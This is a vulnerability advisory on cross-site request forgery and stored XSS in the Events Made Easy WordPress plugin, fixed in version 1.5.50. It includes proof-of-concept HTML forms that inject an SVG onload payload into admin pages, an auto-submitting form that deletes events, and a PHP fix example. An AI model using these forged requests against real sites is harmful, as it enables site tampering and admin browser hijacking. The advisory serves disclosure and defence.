- Plugin link: https://wordpress.org/plugins/events-made-easy/
- Active Installs: 10,000+
- Version tested: 1.5.49
- CVE Reference: Waiting
- Original advisory: https://www.davidsopas.com/events-made-easy-wordpress-plugin-csrf-persistent-xss/
Events Made Easy is a full-featured event management solution for WordPress. Events Made Easy supports public, private, draft and recurring events, locations management, RSVP (+ optional approval), Paypal, 2Checkout, FirstData and Google maps. With Events Made Easy you can plan and publish your event, or let people reserve spaces for your weekly meetings. You can add event lists, calendars and descriptions to your blog using multiple sidebar widgets or shortcodes; if you are a web designer you can simply employ the template tags provided by Events Made Easy.
When playing around with this plugin I noticed a couple of vulnerabilities. In my opinion they are critical because they could cause damage to a WordPress installation.

All of them are CSRF issues: the vendor forgot to place a security token (wp_nonce) on the affected forms, so a request built by a third-party page is processed exactly like one submitted from the plugin's own admin screen.
#1 Add template CSRF + Persistent XSS

URL: /wp-admin/admin.php?page=eme-templates

If an authenticated admin clicks the “Add template” button on an HTML page containing this code:
<form action="https://victims_website/wp-admin/admin.php?page=eme-templates" method="POST">
  <input type="hidden" name="eme_admin_action" value="do_addtemplate" />
  <input type="hidden" name="description" value="<svg/onload=confirm(1)>" />
  <input type="hidden" name="format" value="csrf" />
  <input type="submit" name="submit" value="Add template" />
</form>
it will add a persistent XSS vector in the template description field. The payload executes automatically whenever the admin visits admin.php?page=eme-templates, because the stored description is rendered without output escaping.

Possible attack scenario:

- Malicious user checks that Events Made Easy is installed on a WordPress installation
- Malicious user sends the admin a link to a page that has an auto-submit form with an XSS vector that hijacks the victim's browser
- Victim visits the page and gets hijacked
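The two controls the advisory says were missing, shown as an added example in WordPress PHP (this is not the vendor's 1.5.50 patch nor the plugin's own code): a nonce bound to the action and a capability check on the handler, plus escaping when the stored value is displayed. The POST field names come from the PoC above; the function names, the nonce action 'eme_add_template', the nonce field 'eme_template_nonce' and the 'manage_options' capability are assumptions. The same pattern applies to the form-field and cleanup handlers in #2 and #3.

```php
<?php
// Added example, not the plugin's code. Names prefixed eme_example_ are hypothetical.

// Form side: the nonce field is what a cross-site page cannot forge, because the
// token is derived from the logged-in user's session and the action name.
function eme_example_render_add_template_form() {
    echo '<form method="POST" action="' . esc_url( admin_url( 'admin.php?page=eme-templates' ) ) . '">';
    wp_nonce_field( 'eme_add_template', 'eme_template_nonce' ); // assumed action/field names
    echo '<input type="hidden" name="eme_admin_action" value="do_addtemplate" />';
    echo '<input type="text" name="description" />';
    echo '<textarea name="format"></textarea>';
    submit_button( 'Add template' );
    echo '</form>';
}

// Handler side: verify who is asking and that the request came from our own form
// before touching the database.
function eme_example_handle_add_template() {
    if ( ! isset( $_POST['eme_admin_action'] ) || 'do_addtemplate' !== $_POST['eme_admin_action'] ) {
        return;
    }
    // 1. Authorization: an authenticated user is not automatically allowed to manage templates.
    if ( ! current_user_can( 'manage_options' ) ) { // capability is an assumption
        wp_die( 'Insufficient privileges.' );
    }
    // 2. CSRF defence: dies with a 403-style page if the nonce is missing or invalid.
    check_admin_referer( 'eme_add_template', 'eme_template_nonce' );
    // 3. Sanitize on input; wp_unslash() undoes WordPress' magic-quotes-style escaping.
    $description = sanitize_text_field( wp_unslash( $_POST['description'] ) );
    $format      = wp_kses_post( wp_unslash( $_POST['format'] ) );
    // ... persist $description and $format with the plugin's storage code (omitted).
}

// 4. Escape on output: a stored "<svg/onload=confirm(1)>" is rendered as literal text,
// so even data that reached the database by another route cannot execute.
function eme_example_render_description( $description ) {
    return '<td>' . esc_html( $description ) . '</td>';
}
```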
#2 Add Form Field CSRF + Persistent XSS

URL: /wp-admin/admin.php?page=eme-formfields

If an authenticated admin clicks the “Add field” button on an HTML page containing this code:
<form action="https://victims_website/wp-admin/admin.php?page=eme-formfields" method="POST">
  <input type="hidden" name="eme_admin_action" value="do_addformfield" />
  <input type="hidden" name="field_name" value="<svg/onload=confirm(1)>" />
  <input type="hidden" name="field_type" value="1" />
  <input type="hidden" name="field_info" value="csrf" />
  <input type="hidden" name="field_tags" value="csrf" />
  <input type="submit" name="submit" value="Add field" />
</form>
The attack scenario is the same as for vulnerability #1; the same issue affects form fields in this plugin.

#3 "Remove events older than" CSRF

URL: /wp-admin/admin.php?page=eme-cleanup

With this CSRF a malicious user could delete all events older than a certain age.

In my proof of concept I used an auto-submit form, which could also be used in vulnerabilities #1 and #2.
<form action="https://victims_website/wp-admin/admin.php?page=eme-cleanup" name="dsopas" method="POST">
  <input type="hidden" name="page" value="eme-cleanup" />
  <input type="hidden" name="eme_admin_action" value="eme_cleanup" />
  <input type="hidden" name="eme_number" value="1" />
  <input type="hidden" name="eme_period" value="day" />
  <input type="hidden" name="doaction" value="Apply" />
</form>
<script> document.dsopas.submit(); </script>
Possible attack scenario:

- Malicious user checks that Events Made Easy is installed on a WordPress installation
- Malicious user sends the admin a link to the page that has this auto-submit form
- Without the victim noticing, events older than 1 day will be removed
Solution:

The vendor, in a matter of a few hours, launched a patched version – 1.5.50. Also, he was kind enough to put my name on the changelog.

-David Sopas
davidsopas.com <https://www.davidsopas.com>
@dsopas <https://www.twitter.com/dsopas>